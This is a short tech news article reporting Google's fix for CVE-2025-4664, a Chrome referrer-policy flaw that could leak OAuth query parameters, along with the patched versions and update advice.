Netvora logo
Submit Startup Subscribe
Home About Contact Submit Startup Subscribe

Google Secures Chrome Vulnerability that Allows Hackers to Steal User Accounts

Comment

Google Secures Chrome Vulnerability that Allows Hackers to Steal User Accounts

Netvora May 15, 2025 at 09:40 AM Security
Google Secures Chrome Vulnerability that Allows Hackers to Steal User Accounts

Google Secures Chrome Vulnerability that Allows Hackers to Steal User Accounts

By Netvora Tech News

Google has fixed a critical vulnerability in its Chrome browser that allowed hackers to steal user accounts. The tech giant warns that a public exploit for the issue is already available, and it has assigned a severity level of "high" to the problem. The vulnerability, identified as CVE-2025-4664, occurs when the Loader component of the browser fails to enforce policies correctly.

The issue allows hackers to steal data from other websites that the user has opened in their browser. This is possible because the Link-header can be used to set a referrer policy, which can be exploited to capture the full query parameter. Query parameters can contain sensitive data, such as in OAuth flows, which could be used to take over a user's account.

According to security researcher Vsevolod Kokorin, who discovered the vulnerability on May 5, the problem is that the query parameter can be used to steal sensitive data. "Query parameters can contain sensitive data, such as in OAuth flows, which could be used to take over a user's account," Kokorin said.

How the Vulnerability Works

The vulnerability occurs when a user visits a specially crafted website. The website can then steal data from other websites that the user has opened in their browser. This is possible because the browser fails to enforce the correct policies, allowing the hacker to capture the full query parameter.

  • The hacker can use the Link-header to set a referrer policy that allows them to capture the full query parameter.
  • The query parameter can contain sensitive data, such as in OAuth flows, which could be used to take over a user's account.
  • The hacker can use the stolen data to steal user accounts or access sensitive information.

Impact and Mitigation

The vulnerability has been fixed in Chrome 136.0.7103.113/.114 for Windows and macOS. The Linux version of Chrome has also been updated to version 136.0.7103.113. The new versions will be rolled out automatically to users over the next few days and weeks.

Users who do not want to wait can manually update their browser by visiting the Chrome updates page.

In the meantime, users are advised to exercise caution when visiting websites and to keep their browser and operating system up to date.

Comments (0)

Leave a comment

Back to homepage

You might also like